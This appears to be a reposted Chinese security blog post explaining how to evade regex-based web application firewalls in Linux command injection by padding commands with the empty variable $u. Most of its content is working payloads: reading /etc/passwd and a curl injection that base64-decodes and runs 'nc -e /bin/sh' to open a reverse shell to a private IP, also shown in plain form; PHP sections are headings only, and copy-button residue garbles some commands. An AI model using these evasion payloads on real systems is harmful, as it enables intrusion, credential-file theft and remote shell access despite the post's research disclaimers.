####################
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
####################
0x01 linux
当某个站点存在命令执行时,可通过linux的空变量$u来绕过正则WAF匹配:
使用空变量$u,linux中是可以存在空变量的,直接被系统视为空字符串,空变量不会对输出造成影响,可以借此来绕过基于正则表达式的过滤器和模式匹配。
详情请见:绕过CloudFlare WAF和ModSecurityOWASP CRS3核心规则集的技巧介绍
Copycat$u /etc$u/passwd$u
Copycurl-s "http://192.168.145.5/test.php?file=&/bin$u/echo$u bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjE0NS4xIDQ0NDQgICAK|/usr$u/bin$u/base64$u -d|/bin$u/sh$u"
curl-s "http://192.168.145.5/test.php?file=&/bin/ nc -e /bin/sh 192.168.145.1 4444"
0x02 php
php一句话:
php文件上传:
原文始发于微信公众号(菜鸟小新):绕过一些不同寻常的WAF限制
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论